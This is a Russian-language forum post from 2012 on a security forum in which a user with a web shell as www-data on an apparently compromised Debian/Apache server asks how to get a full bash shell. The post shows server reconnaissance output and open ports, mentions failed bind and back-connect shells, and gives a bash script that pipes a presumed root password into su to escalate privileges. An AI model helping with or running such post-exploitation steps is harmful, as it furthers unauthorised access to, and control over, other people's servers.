HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Как получить bash shell из под web shell
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 27.05.2012, 14:46
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию
Ситуация такова:

Сервер:

Цитата:
Сообщение от None  
Server software: Apache/1.3.33 (Unix) PHP/4.4.1 mod_ssl/2.8.22 OpenSSL/0.9.7i
Disabled PHP Functions: none
cURL support: enabled
Supported databases: MySql (4.0.20), PostgreSQL
OS version: Linux version 2.6.31.5xen64 (root@24h01) (gcc version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5)) #1 SMP Wed Nov 4 16:28:19 CET 2009
Distr name: Debian GNU/%s 2.2 %h
Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, locate
Danger: iptables
Downloaders: wget, lwp-mirror
Открытые порты:

Цитата:
Сообщение от None  
ctive Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3307 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:80 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:81 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.169:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:443 0.0.0.0:* LISTEN
tcp 0 0 ***.4.***.153:444 0.0.0.0:* LISTEN
tcp 0 0 :::22 :::* LISTEN
Открытые порты на интернет:

80, 81, 443, 444

остальные отфильтрованы.

Есть предположительно пароль root

Забиндить порт не получилось и не получается открыть бекконнект. Наверно настройки iptables.

Написал уже баш скрипт на подобии такого:

Код:
Code:
cmd=$1
(
  sleep 1
  echo "*root-pass*"
 echo $cmd
sleep 1
  echo "exit"
) | su
Но похоже su не выполняется от

Цитата:
Сообщение от None  
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
при выполнении su --help помощь не выводится.

хотя

Цитата:
Сообщение от None  
$ ls -la /bin/su
-rwsr-xr-x 1 root root 23420 Sep 26 2000 /bin/su
башскрипт без su работает отлично при выполнении его через php.

Больше пока не могу придумать возможные варианты. Может кто то подскажет еще какие ни будь варианты получения bash?

Заранее спасибо

PS

Сейчас подумал попробовать выполнить локальный коннект на 22 порт, но и ssh и telnet похоже тоже не выполняются (хотя права rwxr-xr-x) так как хелп не выдает.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ